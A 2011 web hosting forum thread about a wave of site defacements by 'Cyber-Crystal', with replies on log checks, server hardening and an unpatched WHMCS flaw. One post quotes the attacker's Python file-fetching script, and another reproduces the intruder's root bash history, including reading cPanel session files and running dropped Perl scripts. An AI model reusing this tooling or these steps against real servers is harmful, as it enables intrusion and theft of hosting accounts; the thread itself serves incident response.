Results 1 to 21 of 21
  1. #1
    Join Date
    Mar 2011
    Location
    florida
    Posts
    158

    Hacked by Cyber-Crystal

    A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
    the page will say Hacked by CYBER-CRYSTALL
    I googled and have noticed thousands of sites are being currently attacked this way
    My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks

  2. #2
    Join Date
    Mar 2011
    Location
    Edinburgh, UK
    Posts
    567
    Someone has managed to upload files to your webserver directory. What OS and webserver are you using? Check your webserver logs to see how the files were added.

  3. #3
    Indeed, you should check the server logs. Also update the script you are using (wordpress etc) to the latest version.
    PlotHost - Secure Web Hosting Plans - Since 2008
    Shared and Reseller Plans | 24x7 Technical Support

  4. #4
    Join Date
    Jul 2011
    Location
    Sittingbourne, Kent, UK
    Posts
    197
    Check server access logs for successful logins:

    last
    cat /var/log/secure* | grep ssh | grep Accept
    cat /var/log/secure* |grep ftp |grep Accept
    less /var/log/messages | grep ftp

    Once done check for hidden dirs:

    updatedb
    locate "..."
    locate ".. "
    locate " .."
    locate ". "
    locate " ."

    Assuming you find nothing suspicious here, start checking access logs and such for suspicious items, ensure you check for rootkits also.

    I'm afraid it's more likely that your personal computer has been exploited and an FTP client that saves passwords in clear text has allowed these details to be compromised.

    Failing this check the server for possible exploits / out of date software.

    Good luck with your search I hope you keep us up to date.
    RackSRV Communications Limited
    UK specialists in Dedicated Servers & Server Colocation
    Company: 06856870 VAT: GB 934 7073 15 Tel: 0330 111 4444

  5. #5
    Join Date
    Nov 2011
    Location
    Egypt
    Posts
    20
    Check scripts on your sites that allow uploading maliciuos files

    I think this hacker can't do anything except adding his index files only not sql injection or others

    so I recommended to secure your server with firewall CSF and modsecurity

  6. #6
    Join Date
    Jul 2009
    Location
    UK
    Posts
    1,312
    My first port of call would be to look at the FTP logs if a lot of people have been done the same way.

    My second look would be at any kind of 3rd party scripts that a lot of other people may use ( Wordpress, Mailer scripts, Monitoring scripts , etc etc.. )

    Its evidently a generic hack that a lot of people are vuln for.
    Live Chat Support Software for your Business website - IMsupporting.com

  7. #7
    Join Date
    Jul 2010
    Location
    Salt Lake City, Utah
    Posts
    5
    A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the otherone- was in the rootdir).

    Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

    Please lemme know if you find anything I've missed!
    Last edited by ioTerrence; 12-09-2011 at 09:48 PM. Reason: Corrected host's url.

  8. #8
    Join Date
    Jan 2004
    Posts
    79
    Quote Originally Posted by Dig1 View Post
    A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
    the page will say Hacked by CYBER-CRYSTALL
    I googled and have noticed thousands of sites are being currently attacked this way
    My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks
    Holy cow. A google search renders hundreds of hacked sites. Looks like someone needs to get a life.

  9. #9
    Join Date
    Jul 2010
    Location
    Salt Lake City, Utah
    Posts
    5
    Also came across this code floating around online, thanks to the email address they left behind. I don't know anything about Python, but if I'm interpreting it right, part of it is some kind of URL fetcher?

    #!/usr/bin/python
    # mekad By Cyber-Crystal
    #
    # Cyb3r.Crystal@Gmail.com

    # tryag.cc

    import urllib2,re
    raw = raw_input('URL CONF : ')
    url = urllib2.urlopen(raw)
    data = url.read()
    finddata = re.findall('href="(.*?)">',data)
    for cyb3r in range(len(finddata)):
    try:
    filecon = open(finddata[cyb3r],'a')
    done = urllib2.urlopen(raw+finddata[cyb3r])
    wewe = done.read()
    print "Witteng ....\n"
    filecon.write(wewe)
    print "Done "
    except IOError:
    print "error"

  10. #10
    Join Date
    Mar 2011
    Location
    florida
    Posts
    158

    UPDATE

    Yes and in the /etc/httpd/conf they also added 5 files named 1.pl 2.pl 3.pl etc
    So i figured they had to have accessed root someway and did this and added the files
    in roots bash history >
    ls -l /etc/valiases
    cd /etc/valiases
    ls -la /etc/valiases
    ls -la /etc/valiases/
    cd /usr/loca/apache
    cd /etc/httpd/conf
    cat httpd.conf | grep DocumentRoot
    nano 1.pl
    pico 1.pl
    nano 1.pl
    yum install nano
    nano 1.pl
    perl 1.pl
    nano 2.pl
    perl 2.pl
    nano 3.pl
    perl 3.pl
    ifconfig
    nano 4.pl
    perl 4.pl
    exit
    pdw
    pwd
    ls
    locate index.html
    cd /var/www
    ls
    cd html
    ls
    cd ..
    cd /usr/local/apache
    cd /usr/local
    ls
    cd /etc/httpds
    cd /etc/httpd
    ls
    cd conf
    cat httpd.conf | grep DocumentRoot
    cat /var/cpanel
    cat * /var/cpanel/sessions
    dec6find /home*/*/public_html -type l
    ........
    So of instead of looking for any more compromised files i reinstalled the os and added Server Security Harding like >
    rkhunter,denyhost,fail2ban,Mod_security,AIDE (Advanced Intrusion Detection Environment),and locked down httpd config (file indexing ) an / access also Made Root nologin except by SU thru a special user with a passwd of 16 char , numbers and punctuation also tightened PHP and MYSQL security
    I reloaded from backup all customers websites and all is well for now
    my iptables have grown quite a bit
    a few country bans were atoadded and denyhost has added to deny host file also
    I am a little more confident now!

  11. #11
    Join Date
    Jul 2009
    Location
    UK
    Posts
    1,312
    Quote Originally Posted by Dig1 View Post
    So of instead of looking for any more compromised files i reinstalled the os and added Server Security Harding
    Probably the best thing.

    - You have identified whats going on and what level of compromise you have had.
    - You have taken the best action possible and re-installed now knowing what to look out for.

    Only if everyone followed the same method. I see too many posts about people "fixing" a hacked server and leaving it running..
    Live Chat Support Software for your Business website - IMsupporting.com

  12. #12
    Join Date
    Mar 2011
    Location
    florida
    Posts
    158
    ty yup yup

  13. #13
    Quote Originally Posted by Dig1 View Post
    A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
    the page will say Hacked by CYBER-CRYSTALL
    I googled and have noticed thousands of sites are being currently attacked this way
    My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks
    If it only a number of sites been hacked it could be due to unsecure versions of software. If it was all of the sites im sorry to say but you have been rooted.

    - Ashton
    Ashton Allen | FuseWeb Limited
    Premium UK Webhosting
    | Shared Hosting | VPS | Reseller Hosting | VOIP |
    FuseWeb.co.uk Or follow us on Twitter

  14. #14
    Join Date
    Apr 2008
    Location
    UK
    Posts
    239
    If he can switch directories and read files your server is not setup properly - and just installing the server software you mentioned may not even be enough, it all has to be configured correctly to be effective.

    And btw - this certainly looks like a real SKID
    SafeSrv.net - Secure Hosting, VPN and Management Services.
    WHMCS FreeRADIUS VPN Module. - Build a fully featured VPN business in no time.

  15. #15
    Join Date
    Feb 2006
    Location
    Global
    Posts
    1,642
    Quote Originally Posted by ioTerrence View Post
    A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the otherone- was in the rootdir).

    Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

    Please lemme know if you find anything I've missed!
    I liked that song.

  16. #16

    Affordable Multimedia

    Quote Originally Posted by ioTerrence View Post
    A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the otherone- was in the rootdir).

    Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

    Please lemme know if you find anything I've missed!
    Hi -- I tried to contact you directly, but it won't let me! Anyway, I had FOUR sites hacked by this butthead, and all were hosted with afmu.com. I have been trying to get in touch with someone, anyone at this company every day over the past week and no one seems to care. I'm just curious if you contacted the company and anyone got back to you on this issue.

    Thanks!

  17. #17
    Join Date
    Jul 2010
    Location
    Salt Lake City, Utah
    Posts
    5
    Quote Originally Posted by FireHippie View Post
    Hi -- I tried to contact you directly, but it won't let me! Anyway, I had FOUR sites hacked by this butthead, and all were hosted with afmu.com. I have been trying to get in touch with someone, anyone at this company every day over the past week and no one seems to care. I'm just curious if you contacted the company and anyone got back to you on this issue.

    Thanks!
    Hey FireHippie, unfortunately I still have an open ticket with them. I'm trying not to be a demon customer and give AFMU.com the benefit of the doubt- it's the holiday season, and it looks like they may have been hit disproportionately hard by the script-kiddie. That being said, I do find myself browsing other service providers' offerings...

  18. #18
    Join Date
    Apr 2008
    Location
    UK
    Posts
    239
    If the host was compromised i wouldn't be sticking around either - theres so many things that can be done to keep access to a host if the hacker was that savvy, this guy mentioned in this thread was just a little skid it sounds like..
    SafeSrv.net - Secure Hosting, VPN and Management Services.
    WHMCS FreeRADIUS VPN Module. - Build a fully featured VPN business in no time.

  19. #19
    I too have multiple sites hosted with AFMU.com. This hacker has taken down 3 Wordpress sites and I'm going to take my business elsewhere asap! I'll move my sites and deal with cutting off my automatic payment somehow.

    It's a shame because I've been with AFMU for 7 years now and they've always been very responsive. However an email I just sent them bounced back and there's no way to open a support ticket.

    I feel bad for AFMU too, but I must say their uptime has been shaky at best lately. They crashed back in September for several days also. I don't know what's going on with them, but it irks me that there is NO phone number to get a hold of anyone.

    My question is, how can I get to my MySQL databases that house the Wordpress posts? I must confess I don't know where they are stored in the hierarchy. Can anyone shed some light here? I am able to log in via FTP.

  20. #20
    Join Date
    Feb 2002
    Location
    Dallas, Texas
    Posts
    43
    Quote Originally Posted by PixelGirl View Post
    My question is, how can I get to my MySQL databases that house the Wordpress posts? I must confess I don't know where they are stored in the hierarchy. Can anyone shed some light here? I am able to log in via FTP.
    If you can access FTP, you may be able to access your control panel via yourdomain.com/cpanel or cpanel.yourdomain.

    I would take a full site backup if possible and then give that file to your new host to restore, provided they use cPanel too. That will preserve all of your data, including email accounts and emails stored on the server, databases, etc. Once restored to another cPanel host you should be back up and running without any loss of data.

    We've had a customer come from AFMU a couple days ago, and we managed to transfer his site this way. I'd be happy to do likewise for you or anyone else affected.

    WHMCS released a security patch on December 1 to protect against this exploit. From the sounds of it, AFMU did not apply the patch in time. It was an easy, single file patch that we applied within minutes of receiving the security alert from WHMCS.

    Once WHMCS is exploited, root access to all servers is available to the hacker, which would explain why so many AFMU sites had subsequent problems.

  21. #21
    Join Date
    Feb 2006
    Location
    India
    Posts
    858
    If you have a fixed IP, your websites seem more likely to be hacked.

Similar Threads

  1. Replies: 0
    Last Post: 11-30-2010, 04:46 AM
  2. Twitter's been hacked by "Iranian Cyber Army"
    By Funkadelic in forum Providers and Network Outages and Updates
    Replies: 4
    Last Post: 12-18-2009, 04:04 AM
  3. Crystal reports
    By Pablasso in forum Programming Discussion
    Replies: 0
    Last Post: 02-13-2005, 10:30 PM
  4. Crystal Stream Co-op
    By csnetcrystal in forum Web Site Reviews
    Replies: 1
    Last Post: 09-23-2004, 04:09 PM
  5. crystal Ball
    By islandmarket in forum Web Hosting
    Replies: 6
    Last Post: 10-07-2002, 04:43 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •